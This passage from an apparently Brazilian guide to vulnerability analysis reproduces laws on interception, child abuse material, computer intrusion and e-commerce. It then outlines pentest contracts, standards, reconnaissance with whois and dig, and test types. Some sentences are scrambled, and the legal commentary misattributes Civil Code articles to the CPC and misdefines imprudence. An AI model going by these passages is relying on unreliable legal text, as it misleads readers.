Ministério Público. Art. 7° Para os procedimentos de interceptação de que trata esta Lei, a autoridade policial poderá requisitar serviços e técnicos especializados às concessionárias de serviço público. Art. 8° A interceptação de comunicação telefônica, de qualquer natureza, ocorrerá em autos apartados, apensados aos autos do inquérito


r.c om .br

71


policial ou do processo criminal, preservando-se o sigilo das diligências, gravações e transcrições respectivas. Parágrafo único. A apensação somente poderá ser realizada imediatamente antes do relatório da autoridade, quando se tratar de inquérito policial (Código de Processo Penal, art.10, § 1°) ou na conclusão do processo ao juiz para o despacho decorrente do disposto nos arts. 407, 502 ou 538 do Código de Processo Penal.

Art. 9° A gravação que não interessar à prova será inutilizada por decisão judicial, durante o inquérito, a instrução processual ou após esta, em virtude de requerimento do Ministério Público ou da parte interessada. Parágrafo único. O incidente de inutilização será assistido pelo Ministério Público, sendo facultada a presença do acusado ou de seu representante legal. Art. 10. Constitui crime realizar interceptação de comunicações telefônicas, de informática ou telemática, ou quebrar segredo da Justiça, sem autorização judicial ou com objetivos não autorizados em lei. Pena: reclusão, de dois a quatro anos, e multa. Art. 11. Esta Lei entra em vigor na data de sua publicação. Art. 12. Revogam-se as disposições em contrário. Brasília, 24 de julho de 1996; 175º da Independência e 108º da República. FERNANDO HENRIQUE CARDOSO Nelson A. Jobim

Em uma leitura detalhada da LEI Nº 9.296, DE 24 DE JULHO DE 1996 podemos observar que desde 24 de julho de 1996 já estão previsto a utilização dos equipamentos de informática para auxilio nos processos investigativos pela autoridade policial. (Parágrafo único. O disposto nesta Lei aplica-se à interceptação do fluxo de comunicações em sistemas de informática e telemática).


r.c om .br

72


Lei nº 9.295, de 19 de julho de 1996 (DOU de 20/07/1996 e retificada em 06/08/1996) Dispõe sobre os serviços de telecomunicações e sua organização, sobre o órgão regulador etc. Lei nº 9.472, de 16 de julho de 1997 (DOU de 17/07/1997) Dispõe sobre a organização dos serviços de telecomunicações, a criação e o funcionamento de um órgão regulador e outros aspectos institucionais, nos termos da Emenda Constitucional nº 8, de 1995. Lei nº 9.610, de 19 de fevereiro de 1998 (DOU de 20/02/1998) Altera, atualiza e consolida a legislação sobre direitos autorais etc. Lei nº 9.609, de 19 de fevereiro de 1998 (DOU de 20/02/1998) Dispõe sobre a proteção de propriedade intelectual de programa de computador etc. Lei nº 9.800, de 26 de maio de 1999 (DOU de 27/05/1999) Permite as partes a utilização de sistema de transmissão de dados para a prática de atos processuais. Lei nº 9.983, de 14 de julho de 2000 (DOU de 17/07/2000) Altera o Decreto-Lei nº 2.848, de 7 de dezembro de 1940 – Código Penal. Medida Provisória nº 2.200-2, de 24 de agosto de 2001 (DOU de 27/08/2001) Institui a Infraestrutura de Chaves Públicas Brasileira – ICP-Brasil, transforma o Instituto Nacional de Tecnologia da Informação em autarquia etc. Lei nº 10.176, de 11 de janeiro de 2001 (DOU de 12/01/2001) Altera a Lei nº 8.248, de 23 de outubro de 1991, a Lei nº 8.387, de 30 de dezembro de 1991, e o Decreto-Lei nº 288, de 28 de fevereiro de 1967,


r.c om .br

73


dispondo sobre a capacitação e competitividade do setor de tecnologia da informação.

Lei Complementar nº 105, de 10 de janeiro de 2001 (DOU de 11/01/2001) Dispõe sobre o sigilo das operações de instituições financeiras e dá outras providências. Lei nº 10.520, de 17 de julho de 2002 (DOU 18/07/2002) Institui, no âmbito da União, Estados, Distrito Federal e Municípios, nos termos do art. 37, inciso XXI, da Constituição Federal, modalidade de licitação denominada pregão, para aquisição de bens e serviços comuns etc. Lei nº 10.408, de 10 de janeiro de 2002 (DOU de 11/01/2002) Altera a Lei nº 9.504, de 30 de setembro de 1997, que estabelece normas para as eleições, para ampliar a segurança e a fiscalização do voto eletrônico. Lei nº 10.753, de 30 de outubro de 2003 (DOU de 31/10/2003) Institui a Política Nacional do Livro Lei nº 10.740, de 01 de outubro de 2003 (DOU de 02/10/2003) Altera a Lei nº 9.504, de 30 de setembro de 1997, e a Lei nº 10.408, de 10 de janeiro de 2002, para implantar o registro digital do voto. Lei nº 10.664, de 22 de abril de 2003 (DOU de 23/04/2003) Altera as Leis nos 8.248, de 23 de outubro de 1991, 8.387, de 30 de dezembro de 1991, e 10.176, de 11 de janeiro de 2001, dispondo sobre a capacitação e competitividade do setor de tecnologia da informação, e dá outras providências. Lei nº 10.077, de 30 de dezembro de 2004 (DOU de 31/12/2004) Altera a Lei nº 8.248, de 23 de outubro de 1991, a Lei nº 8.387, de 30 de dezembro de 1991, e a Lei nº 10.176, de 11 de janeiro de 2001, dispondo


r.c om .br

74


sobre a capacitação e competitividade do setor de informática e automação.

Lei nº 10.973, de 02 de dezembro de 2004 (DOU de 03/12/2004) Dispõe sobre incentivos à inovação e à pesquisa científica e tecnológica no ambiente produtivo. Lei nº 11.196, de 21 de novembro de 2005 (DOU de 22/11/2005) Institui o Regime Especial de Tributação para a Plataforma de Exportação de Serviços de Tecnologia da Informação – REPES, o Regime Especial de Aquisição de Bens de Capital para Empresas Exportadoras – RECAP e o Programa de Inclusão Digital; dispõe sobre incentivos fiscais para a inovação tecnológica. Lei nº 11.111, de 05 de maio de 2005 (DOU de 06/05/2005) Regulamenta a parte final do disposto no inciso XXXIII do caput do art. 5º da Constituição Federal. Lei nº 11.419, de 19 de dezembro de 2006 (DOU de 20/12/2006) Dispõe sobre a informatização do processo judicial; altera a Lei nº 5.869, de 11 de janeiro de 1973 – Código de Processo Civil. Lei nº 11.341, de 07 de agosto de 2006 (DOU de 08/08/2006). Altera o parágrafo único do art. 541 do Código de Processo Civil – Lei no 5.869, de 11 de janeiro de 1973, para admitir as decisões disponíveis em mídia eletrônica, inclusive na Internet, entre as suscetíveis de prova de divergência jurisprudencial. Lei nº 11.280, de 16 de fevereiro de 2006 (DOU de 17/02/2006) Altera os arts. 112, 114, 154, 219, 253, 305, 322, 338, 489 e 555 da Lei nº 5.869, de 11 de janeiro de 1973 – Código de Processo Civil, relativos à incompetência relativa, meios eletrônicos, prescrição, distribuição por dependência, exceção de incompetência, revelia, carta precatória e rogatória, ação rescisória e vista dos autos; e revoga o art. 194 da Lei nº


r.c om .br

75


10.406, de 10 de janeiro de 2002 – Código Civil.

Lei nº 11.484, de 31 de maio de 2007 (DOU de 31/05/2007) Dispõe sobre os incentivos às indústrias de equipamentos para TV Digital e de componentes eletrônicos semicondutores e sobre a proteção à propriedade intelectual das topografias de circuitos integrados, instituindo o Programa de Apoio ao Desenvolvimento Tecnológico da Indústria de Semicondutores – PADIS e o Programa de Apoio ao Desenvolvimento Tecnológico da Indústria de Equipamentos para a TV Digital – PATVD; altera a Lei nº 8.666, de 21 de junho de 1993; e revoga o art. 26 da Lei nº 11.196, de 21 de novembro de 2005. Lei nº 11.829, de 25 de novembro de 2008 (DOU de 26/11/2008) Altera a Lei nº 8.069, de 13 de julho de 1990 – Estatuto da Criança e do Adolescente, para aprimorar o combate à produção, venda e distribuição de pornografia infantil, bem como criminalizar a aquisição e a posse de tal material e outras condutas relacionadas à pedofilia na internet.

Presidência da República Casa Civil Subchefia para Assuntos Jurídicos

LEI Nº 11.829, DE 25 DE NOVEMBRO DE 2008. O PRESIDENTE DA REPÚBLICA Faço saber que o Congresso Nacional decreta e eu sanciono a seguinte Lei: Art. 1o Os arts. 240 e 241 da Lei n o 8.069, de 13 de julho de 1990, passam a vigorar com a seguinte redação:


r.c om .br

76


“Art. 240. Produzir, reproduzir, dirigir, fotografar, filmar ou

registrar, por qualquer meio, cena de sexo explícito ou pornográfica, envolvendo criança ou adolescente: Pena – reclusão, de 4 (quatro) a 8 (oito) anos, e multa.

§ 1o Incorre nas mesmas penas quem agencia, facilita, recruta, coage, ou de qualquer modo intermedeia a participação de criança ou adolescente nas cenas referidas no caput deste artigo, ou ainda quem com esses contracena. § 2o Aumenta-se a pena de 1/3 (um terço) se o agente comete o crime: I – No exercício de cargo ou função pública ou a pretexto de exercê-la; II – Prevalecendo-se de relações domésticas, de coabitação ou de hospitalidade; III – Prevalecendo-se de relações de parentesco consanguíneo ou afim até o terceiro grau, ou por adoção, de tutor, curador, preceptor, empregador da vítima ou de quem, a qualquer outro título, tenha autoridade sobre ela, ou com seu consentimento.” (NR) “Art. 241. Vender ou expor à venda fotografia, vídeo ou outro registro que contenha cena de sexo explícito ou pornográfica envolvendo criança ou adolescente: Pena – reclusão, de 4 (quatro) a 8 (oito) anos, e multa.” (NR)

Art. 2o A Lei n o 8.069, de 13 de julho de 1990, passa a vigorar acrescida dos seguintes arts. 241-A, 241-B, 241-C, 241-D e 241-E: “Art. 241-A. Oferecer, trocar, disponibilizar, transmitir, distribuir, publicar ou divulgar por qualquer meio, inclusive por meio de sistema de informática ou telemático, fotografia, vídeo ou outro registro que contenha cena de sexo explícito ou pornográfica envolvendo criança ou adolescente: Pena – reclusão, de 3 (três) a 6 (seis) anos, e multa. § 1o Nas mesmas penas incorre quem: I – Assegura os meios ou serviços para o armazenamento das fotografias, cenas ou imagens de que trata o caput deste artigo;


r.c om .br

77


II – Assegura, por qualquer meio, o acesso por rede de computadores às fotografias, cenas ou imagens de que trata o caput deste artigo. § 2o As condutas tipificadas nos incisos I e II do § 1o deste artigo são puníveis quando o responsável legal pela prestação do serviço, oficialmente notificado, deixa de desabilitar o acesso ao conteúdo ilícito de que trata o caput deste artigo. Art. 241-B. Adquirir, possuir ou armazenar, por qualquer meio, fotografia, vídeo ou outra forma de registro que contenha cena de sexo explícito ou pornográfica envolvendo criança ou adolescente: Pena – reclusão, de 1 (um) a 4 (quatro) anos, e multa. § 1o A pena é diminuída de 1 (um) a 2/3 (dois terços) se de pequena quantidade o material a que se refere o caput deste artigo. § 2o Não há crime se a posse ou o armazenamento tem a finalidade de comunicar às autoridades competentes a ocorrência das condutas descritas nos arts. 240, 241, 241-A e 241-C desta Lei, quando a comunicação for feita por: I – Agente público no exercício de suas funções; II – Membro de entidade, legalmente constituída, que inclua, entre suas finalidades institucionais, o recebimento, o processamento e o encaminhamento de notícia dos crimes referidos neste parágrafo; III – representante legal e funcionários responsáveis de provedor de acesso ou serviço prestado por meio de rede de computadores, até o recebimento do material relativo à notícia feita à autoridade policial, ao Ministério Público ou ao Poder Judiciário. § 3o As pessoas referidas no § 2o deste artigo deverão manter sob sigilo o material ilícito referido.

Art. 241-C. Simular a participação de criança ou adolescente em cena de sexo explícito ou pornográfica por meio de adulteração, montagem ou modificação de fotografia, vídeo ou qualquer outra forma de representação visual: Pena – reclusão, de 1 (um) a 3 (três) anos, e multa. Parágrafo único. Incorre nas mesmas penas quem vende, expõe à venda, disponibiliza, distribui, publica ou divulga por qualquer meio,


r.c om .br

78


adquire, possui ou armazena o material produzido na forma do caput deste artigo.

Art. 241-D. Aliciar, assediar, instigar ou constranger, por qualquer meio de comunicação, criança, com o fim de com ela praticar ato libidinoso: Pena – reclusão, de 1 (um) a 3 (três) anos, e multa. Parágrafo único. Nas mesmas penas incorre quem: I – Facilita ou induz o acesso à criança de material contendo cena de sexo explícito ou pornográfica com o fim de com ela praticar ato libidinoso; II – Pratica as condutas descritas no caput deste artigo com o fim de induzir criança a se exibir de forma pornográfica ou sexualmente explícita. Art. 241-E. Para efeito dos crimes previstos nesta Lei, a expressão “cena de sexo explícito ou pornográfica” compreende qualquer situação que envolva criança ou adolescente em atividades sexuais explícitas, reais ou simuladas, ou exibição dos órgãos genitais de uma criança ou adolescente para fins primordialmente sexuais.”

Art. 3o Esta Lei entra em vigor na data de sua publicação. Brasília, 25 de novembro de 2008; 187o da Independência e 120 da República. o

LUIZ INÁCIO LULA DA SILVA Tarso Genro Dilma Rousseff

Lei nº 11.934, de 05 de maio de 2009 (DOU de 06/05/2009) Dispõe sobre limites à exposição humana a campos elétricos, magnéticos e eletromagnéticos; altera a Lei nº 4.771, de 15 de setembro de 1965.


r.c om .br

79


Lei nº 11.903, de 14 de janeiro de 2009 (DOU de 15/01/2009) Dispõe sobre o rastreamento da produção e do consumo de medicamentos por meio de tecnologia de captura, armazenamento e transmissão eletrônica de dados. Lei nº 11.900, de 08 de janeiro de 2009 (DOU de 09/01/2009) Altera dispositivos do Decreto-Lei nº 3.689, de 03 de outubro de 1941 – Código de Processo Penal, para prever a possibilidade de realização de interrogatório e outros atos processuais por sistema de videoconferência. Lei nº 12.249, de 11 de junho de 2010 (DOU de 14/06/2010) Cria o Programa Um Computador por Aluno – PROUCA e institui o regime especial de aquisição de Computadores para uso educacional. Lei nº 12.270, de 24 de junho de 2010 (DOU de 25/06/2010) Dispõe sobre medidas de suspensão de concessões ou outras obrigações do País relativas aos direitos de propriedade intelectual. Lei nº 12.258, de 15 de junho de 2010 (DOU de 16/06/2010) Altera o Decreto-Lei nº 2.848, de 7 de dezembro de 1940 (Código Penal), e a Lei nº 7.210, de 11 de julho de 1984 (Lei de Execução Penal), para prever a possibilidade de utilização de equipamento de vigilância indireta pelo condenado nos casos em que especifica. Medida Provisória nº 534, de 20 de maio de 2011 (DOU de 23/05/2011) Altera o art. 28 da Lei nº 11.196, de 21 de novembro de 2005, para incluir no Programa de Inclusão Digital Tablet PC produzido no País conforme processo produtivo básico estabelecido pelo Poder Executivo. Lei nº 12.485, de 12 de maio de 2011 (DOU de 13/05/2011) Dispõe sobre a comunicação audiovisual de acesso condicionado; altera a Medida Provisória nº 2.228-1, de 6 de setembro de 2001, e as Leis nº


r.c om .br

80


11.437, de 28 de dezembro de 2006, 5.070, de 7 de julho de 1966, 8.977, de 6 de janeiro de 1995, e 9.472, de 16 de julho de 1997.

Lei nº 12.507, de 11 de outubro de 2011 (DOU de 13/10/2011) Altera o art. 28 da Lei nº 11.196, de 21 de novembro de 2005, para incluir no Programa de Inclusão Digital tablet PC produzido no País conforme processo produtivo básico estabelecido pelo Poder Executivo; altera as Leis nº 10.833, de 29 de dezembro de 2003, nº 11.482, de 31 de maio de 2007, nº 11.508, de 20 de julho de 2007, e nº 8.212, de 24 de julho de 1991; e revoga dispositivo da Medida Provisória nº 540, de 2 de agosto de 2011. Lei nº 12.527, de 18 de novembro de 2011 (DOU de 18/11/2011 Regula o acesso a informações previsto no inciso XXXIII do art. 5º, no inciso II do § 3º do art. 37 e no § 2º do art. 216 da Constituição Federal; altera a Lei nº 8.112, de 11 de dezembro de 1990; revoga a Lei nº 11.111, de 5 de maio de 2005, e dispositivos da Lei nº 8.159, de 8 de janeiro de 1991; e dá outras providências. Lei nº 12.551, de 15 de dezembro de 2011 (DOU de 16/12/2011) Altera o art. 6º da Consolidação das Leis do Trabalho (CLT), aprovada pelo Decreto-Lei nº 5.452, de 1º de maio de 1943, para equiparar os efeitos jurídicos da subordinação exercida por meios telemáticos e informatizados à exercida por meios pessoais e diretos. Lei nº 12.682, de 09 de julho de 2012 (DOU de 10/07/2012) Dispõe sobre a elaboração e o arquivamento de documentos em meio eletromagnético. Lei nº 12.686, de 18 de julho de 2012 (DOU de 19/07/2012) Normatiza a divulgação de documentos institucionais produzidos em língua estrangeira, nos sítios e portais da rede mundial de computadores – internet mantidos por órgãos e entidades públicos.


r.c om .br

81


Lei nº 12.735, de 30 de novembro de 2012 (DOU de 03/12/2012) Altera o Decreto-Lei nº 2.848, de 7 de dezembro de 1940 – Código Penal, o Decreto-Lei nº 1.001, de 21 de outubro de 1969 – Código Penal Militar, e a Lei nº 7.716, de 5 de janeiro de 1989, para tipificar condutas realizadas mediante uso de sistema eletrônico, digital ou similares, que sejam praticadas contra sistemas informatizados e similares.

Lei nº 12.737, de 30 de novembro de 2012 (DOU de 03/12/2012) Dispõe sobre a tipificação criminal de delitos informáticos; altera o Decreto-Lei nº 2.848, de 7 de dezembro de 1940 – Código Penal; e dá outras providências.

Presidência da República Casa Civil Subchefia para Assuntos Jurídicos LEI Nº 12.737, DE 30 DE NOVEMBRO DE 2012. A PRESIDENTA DA REPÚBLICA Faço saber que o Congresso Nacional decreta e eu sanciono a seguinte Lei: Art. 1o Esta Lei dispõe sobre a tipificação criminal de delitos informáticos e dá outras providências. Art. 2o O Decreto-Lei n o 2.848, de 7 de dezembro de 1940 Código Penal, fica acrescido dos seguintes arts. 154-A e 154-B: “Invasão de dispositivo informático

Art. 154-A. Invadir dispositivo informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou


r.c om .br

82


informações sem autorização expressa ou tácita do titular do dispositivo ou instalar vulnerabilidades para obter vantagem ilícita: Ler na integra em http://www.planalto.gov.br/CCIVIL_03/DecretoLei/Del2848.htm#art154a Pena - detenção, de 3 (três) meses a 1 (um) ano, e multa. § 1o Na mesma pena incorre quem produz, oferece, distribui, vende ou difunde dispositivo ou programa de computador com o intuito de permitir a prática da conduta definida no caput. § 2o Aumenta-se a pena de um sexto a um terço se da invasão resulta prejuízo econômico. § 3o Se da invasão resultar a obtenção de conteúdo de comunicações eletrônicas privadas, segredos comerciais ou industriais, informações sigilosas, assim definidas em lei, ou o controle remoto não autorizado do dispositivo invadido: Pena - reclusão, de 6 (seis) meses a 2 (dois) anos, e multa, se a conduta não constitui crime mais grave. § 4o Na hipótese do § 3o, aumenta-se a pena de um a dois terços se houver divulgação, comercialização ou transmissão a terceiro, a qualquer título, dos dados ou informações obtidos. § 5o Aumenta-se a pena de um terço à metade se o crime for praticado contra: I - Presidente da República, governadores e prefeitos; II - Presidente do Supremo Tribunal Federal; III - Presidente da Câmara dos Deputados, do Senado Federal, de Assembleia Legislativa de Estado, da Câmara Legislativa do Distrito Federal ou de Câmara Municipal; ou IV - dirigente máximo da administração direta e indireta federal, estadual, municipal ou do Distrito Federal.”

Ação penal Art. 154-B. Nos crimes definidos no art. 154-A, somente se procede mediante representação, salvo se o crime é cometido contra a administração pública direta ou indireta de qualquer dos Poderes da União, Estados, Distrito Federal ou Municípios ou contra empresas


r.c om .br

83


concessionárias de serviços públicos.” Ler completo em

http://www.planalto.gov.br/CCIVIL_03/DecretoLei/Del2848.htm#art154b

Art. 3o Os arts. 266 e 298 do Decreto-Lei no 2.848, de 7 de dezembro de 1940 - Código Penal, passam a vigorar com a seguinte redação: “Interrupção ou perturbação de serviço telegráfico, telefônico, informático, telemático ou de informação de utilidade pública”.

Art. 266. § 1º Incorre na mesma pena quem interrompe serviço telemático ou de informação de utilidade pública, ou impede ou dificulta-lhe o restabelecimento. Ler na integra em http://www.planalto.gov.br/CCIVIL_03/DecretoLei/Del2848.htm#art266 § 2o Aplicam-se as penas em dobro se o crime é cometido por ocasião de calamidade pública.” (NR) “Falsificação de documento particular

Art. 298. Falsificar, no todo ou em parte, documento particular ou alterar documento particular verdadeiro: Ler na integra em http://www.planalto.gov.br/CCIVIL_03/DecretoLei/Del2848.htm#art298 Falsificação de cartão: Parágrafo único. Para fins do disposto no caput, equipara-se a documento pa rticular o cartão de crédito ou débito.” (NR) Art. 4o Esta Lei entra em vigor após decorridos 120 (cento e vinte) dias de sua publicação oficial. Brasília, 30 de novembro de 2012; 191o da Independência e 124 o da República.


r.c om .br

84


DILMA ROUSSEFF José Eduardo Cardozo

Decreto nº 7.962, de 15 de março de 2013 (DOU de 15/03/2013) Regulamenta a Lei nº 8.078, de 11 de setembro de 1990, para dispor sobre a contratação no comércio eletrônico. Presidência da República Casa Civil Subchefia para Assuntos Jurídicos DECRETO Nº 7.962, DE 15 DE MARÇO DE 2013 A PRESIDENTA DA REPÚBLICA, no uso da atribuição que lhe confere o art. 84, caput, inciso IV, da Constituição, e tendo em vista o disposto na Lei no 8.078, de 11 de setembro de 1990, DECRETA: Art. 1o Este Decreto regulamenta a Lei n o 8.078, de 11 de setembro de 1990, para dispor sobre a contratação no comércio eletrônico, abrangendo os seguintes aspectos: I - Informações claras a respeito do produto, serviço e do fornecedor; II - Atendimento facilitado ao consumidor; e III - Respeito ao direito de arrependimento. Art. 2o Os sítios eletrônicos ou demais meios eletrônicos utilizados para oferta ou conclusão de contrato de consumo devem disponibilizar, em local de destaque e de fácil visualização, as seguintes informações: I - Nome empresarial e número de inscrição do fornecedor, quando houver, no Cadastro Nacional de Pessoas Físicas ou no Cadastro Nacional de Pessoas Jurídicas do Ministério da Fazenda; II - Endereço físico e eletrônico, e demais informações necessárias para sua localização e contato;


r.c om .br

85


III - Características essenciais do produto ou do serviço, incluídos os riscos à saúde e à segurança dos consumidores; IV - Discriminação, no preço, de quaisquer despesas adicionais ou acessórias, tais como as de entrega ou seguros; V - Condições integrais da oferta, incluídas modalidades de pagamento, disponibilidade, forma e prazo da execução do serviço ou da entrega ou disponibilização do produto; e VI - Informações claras e ostensivas a respeito de quaisquer restrições à fruição da oferta.

Art. 3o Os sítios eletrônicos ou demais meios eletrônicos utilizados para ofertas de compras coletivas ou modalidades análogas de contratação deverão conter, além das informações previstas no art. 2 o, as seguintes: I - Quantidade mínima de consumidores para a efetivação do contrato; II - Prazo para utilização da oferta pelo consumidor; e III - Identificação do fornecedor responsável pelo sítio eletrônico e do fornecedor do produto ou serviço ofertado, nos termos dos incisos I e II do art. 2o. Art. 4o Para garantir o atendimento facilitado ao consumidor no comércio eletrônico, o fornecedor deverá: I - Apresentar sumário do contrato antes da contratação, com as informações necessárias ao pleno exercício do direito de escolha do consumidor, enfatizadas as cláusulas que limitem direitos; II - Fornecer ferramentas eficazes ao consumidor para identificação e correção imediata de erros ocorridos nas etapas anteriores à finalização da contratação; III - Confirmar imediatamente o recebimento da aceitação da oferta; IV - Disponibilizar o contrato ao consumidor em meio que permita sua conservação e reprodução, imediatamente após a contratação; V - Manter serviço adequado e eficaz de atendimento em meio eletrônico, que possibilite ao consumidor a resolução de demandas


r.c om .br

86


referentes a informação, dúvida, reclamação, suspensão ou cancelamento do contrato; VI - Confirmar imediatamente o recebimento das demandas do consumidor referidas no inciso, pelo mesmo meio empregado pelo consumidor; e VII - Utilizar mecanismos de segurança eficazes para pagamento e para tratamento de dados do consumidor. Parágrafo único. A manifestação do fornecedor às demandas previstas no inciso V do caput será encaminhada em até cinco dias ao consumidor.

Art. 5o O fornecedor deve informar, de forma clara e ostensiva, os meios adequados e eficazes para o exercício do direito de arrependimento pelo consumidor. § 1o O consumidor poderá exercer seu direito de arrependimento pela mesma ferramenta utilizada para a contratação, sem prejuízo de outros meios disponibilizados. § 2o O exercício do direito de arrependimento implica a rescisão dos contratos acessórios, sem qualquer ônus para o consumidor. § 3o O exercício do direito de arrependimento será comunicado imediatamente pelo fornecedor à instituição financeira ou à administradora do cartão de crédito ou similar, para que: I - A transação não seja lançada na fatura do consumidor; ou II - Seja efetivado o estorno do valor, caso o lançamento na fatura já tenha sido realizado. § 4o O fornecedor deve enviar ao consumidor confirmação imediata do recebimento da manifestação de arrependimento. Art. 6o As contratações no comércio eletrônico deverão observar o cumprimento das condições da oferta, com a entrega dos produtos e serviços contratados, observados prazos, quantidade, qualidade e adequação.


r.c om .br

87


Art. 7o A inobservância das condutas descritas neste Decreto ensejará aplicação das sanções previstas no art. 56 da Lei n o 8.078, de 1990. Ler na integra em http://www.planalto.gov.br/ccivil_03/LEIS/L8078.htm#art5 Art. 8o O Decreto n o 5.903, de 20 de setembro de 2006, passa a vigorar com as seguintes alterações: o

o

o

“Art. 10. Parágrafo único. O disposto nos arts. 2 , 3 e 9 Decreto aplica-se às contratações no comércio eletrônico.” (NR)

deste

Art. 9o Este Decreto entra em vigor sessenta dias após a data de sua publicação. Brasília, 15 de março de 2013; 192º da Independência e 125º da República. DILMA ROUSSEFF José Eduardo Cardozo

Conclusão: “Art. 186 do CPC

Aquele que, por ação ou omissão voluntária, negligência ou imprudência, violar direito e causar dano outrem, ainda que exclusivamente moral.

Art.187 do CPC Também comete ato ilícito o titular de um direito que, ao exercê-lo, excede manifestamente os limites impostos pelo seu fim econômico ou social, pela boa-fé ou pelos bons costumes.

A imperícia, a imprudência e a negligência de alguns profissionais, violam direitos e causa danos muitas vezes irreparáveis, razão pela qual,


r.c om .br

88


nesses casos a Justiça determina a compensação financeira do ofendido. Um breve conceito sobre Imprudência, Negligência e Imperícia. Negligência: Também conhecida como desatenção ou falta de cuidado ao exercer certo ato, consiste na ausência de necessária diligência, implicando em omissão ou inobservância de dever, ou seja, aquele de agir de forma diligente, prudente, agir com o devido cuidado exigido pela situação em tese.

Imprudência: Tem a ver com algo mais que mera falta de atenção, ato que pode revelar-se de má-fé, ou seja, com conhecimento do mal e a intenção de praticá-lo a ação imprudente é aquela revestida de dolo e má-fé concretizada. Age de forma imprudente aquele que mesmo sabedor do grau de risco envolvido, acredita que seja possível a realização do ato sem prejuízo. Imperícia: Requer-se do agente a falta de técnica ou de conhecimento, de outra forma, tem-se uma omissão daquilo que o agente não deveria desprezar, pois consiste em sua função, seu ofício exigindo dele perícia suficiente para exercer suas funções a que lhe são atribuídas. Diante do exposto, pode-se concluir que o trabalho de um analista de vulnerabilidades exige muito mais que conhecimento das ferramentas de informatica disponíveis, mais exige conhecimentos básicos sobre as Leis, não somente do seu país de srcem, mais dependendo do escopo dos testes, também se fará necessário o estudos das leis de outros países. Conclui-se que as clausulas referente ao escopo das responsabilidades não devem sob nenhuma hipótese serem negligenciadas. Considere a situação em que o analista se ver diante de uma infraestrutura de tecnologia da informação para fazer uma analise de vulnerabilidades e nessa infraestrutura existem servidores de banco de dados em três países diferentes! Na pratica esse analista deve procurar estudar um pouco sobre as leis de informatica e utilização da infraestrutura de internet de cada país e não somente de seu país de


r.c om .br

89


srcem. Esse conhecimento é de fundamental importância para o analista, já que em muitos casos, principalmente com clientes de pequeno porte, o cliente não tem todas as informações necessárias, principalmente quando se trata de infraestrutura web. Também deve o analista, ficar atento ao site do ministério das relações exteriores do Brasil em: http://www.itamaraty.gov.br/ Pois existe também a possibilidade de tratados internacionais que venham permitir a execução de determinados testes, tomando-se como base a Lei brasileira, Existem os acordos bilaterais e outros acordos de cooperação, já que muitos países ainda não tem nenhuma legislação especifica em relação a crimes de internet.

Objetivo Uma analise de vulnerabilidades visa identificar fragilidades nos sistemas computacionais, falhas de configurações, falhas de projeto, falhas de programação e potenciais ameaças através da realização de ataques aos ativos e ataques de engenharia social com foco definido em contrato celebrado entre o contratante e o prestador de serviço. Entre as clausulas de tal contrato deve ser estabelecido com clareza à proteção do contratado e um acordo de confidencialidade para que se possam preservar as informações do contratante.

Acordo de confidencialidade e responsabilidade O acordo de confidencialidade visa à proteção do cliente contra a divulgaçãodurante não autorizada de resultados pela contratada a realização do serviçoouedados nesse identificados ponto é fundamental que todas as pesquisas sobre o prestador de serviço já estejam concluídas.


r.c om .br

90


É de fundamental importância à inclusão de uma clausula que limite o uso das informações pelo contratado em seus prepostos e que esteja muito bem definida em contrato. Com o mesmo empenho devem-se estabelecer todos os passos dos testes, isso irá definir o escopo dos testes e as responsabilidades sobre a posse e propriedade dos dispositivos testados.

Padrões É importante seguir modelos já padronizados e consagrados em relação aos procedimentos que devem ser adotados, padrões internacionais de Testes de Invasão, como, OWASP em: http://www.owasp.com/index.php/Main_Page, OSSTMM em: http://www.isecom.org/research/osstmm.html etc. Mais nada impede que você acrescente ou subtraia alguma atividade ou procedimento, afinal uma analise padronizada na Europa ou mesmo nos USA pode não ser o ideal para seu caso. Metodologias Deve-se utilizar metodologias conhecidas sempre que possível e dividir em etapas com foco definido, contemplando as informações detalhadas sobre os níveis de controle de acesso, computadores e redes de telecomunicações, redes sem fio, dispositivos móveis, segurança física, aplicações web etc. Deve-se focar sempre os detalhes técnicos de quais itens exatamente devem ser testados. Uma boa metodologia OpenserSource Security Testing Methodology Manual (OSSTMM) ée apode encontrada para estudo em http://www.isecom.org/ Os relatórios devem ser avaliados por pessoal técnico qualificado para eliminar ou reduzir as possibilidades de indução ao erro no que se refere


r.c om .br

91


à idoneidade da contratada, evitando relatórios ou parte de relatórios fictícios.

Reconhecimento O reconhecimento e ou "coleta passiva" não exige nenhum contato com o sistema alvo, as informações são coletadas a partir de fontes públicas, sites, publicações em jornais etc. e geralmente servem como uma avaliação preliminar sobre o alvo. Essas informações são essenciais para modelar os ataques e determinar quais vetores podem ser explorados mais facilmente. O primeiro passo é vasculhar a Internet em busca de qualquer informação que você considere relevante para o caso. As técnicas mais comuns são consultas a serviços de WHOIS e DNS através de ferramentas como whois, dig, nslookup etc. Sites como Google www.google.com e Server Sniff www.serversniff.net são de extrema importância, listas de discussão, blogs corporativos e de colaboradores, engenharia social, publicações na mídia também costumam conter informações relevantes que podem ajudar no dimensionamento dos ataques. Na fase de reconhecimento será necessário o domínio de todas as ferramentas disponíveis no mercado, ferramentas essas que lhe darão base sólida sobre a infraestrutura e o alvo a ser testado.

Detalhar todas as atividades Nada pode ficar sem documentação detalhada sobre os trabalhos realizados na auditoria da infraestrutura do cliente. Atas de todas as reuniões em todas as fases do projeto. Nas avaliações presenciais, se for o caso, opara analista deve portar sempre prancheta eletrônica agenda pontuar situações que lheuma atraia a atenção, esse e uma procedimento também é válido para as avaliações remotas, lembre-se; o objetivando é encontrar informações sobre possíveis brechas que possam ser exploradas por usuários não autorizados.


r.c om .br

92


Tipos de testes A definição do tipo de teste se será do tipo "caixa preta", "caixa branca" ou "caixa cinza". Testes de Negação de Serviço podem também, adicionalmente serem realizados, desde que estejam dentro do escopo do serviço cliente, pois um teste invasão ser realizadacontratado de várias pelo maneiras, a diferença maisde comum é apode quantidade de conhecimentos sobre os detalhes de implementação do sistema que está sendo testado. Nos testes de caixa preta a equipe não recebe nenhuma informação prévia sobre a infraestrutura do cliente e deve primeiro determinar a localização e extensão dos sistemas ativos disponíveis para iniciar a análise. Do outro lado temos o teste de caixa branca onde a equipe de pentesters recebem informações detalhadas e o mais completo relatório possível sobre a infraestrutura que devem testar, incluem ai informações sobre os diagramas de rede, endereçamento IP. código fonte, equipamentos ativos e informações de Existem também os chamados meio termos onde os testes e informações podem variar de acordo com a vontade do cliente, essas varações podem ser classificadas como testes de caixa cinza .

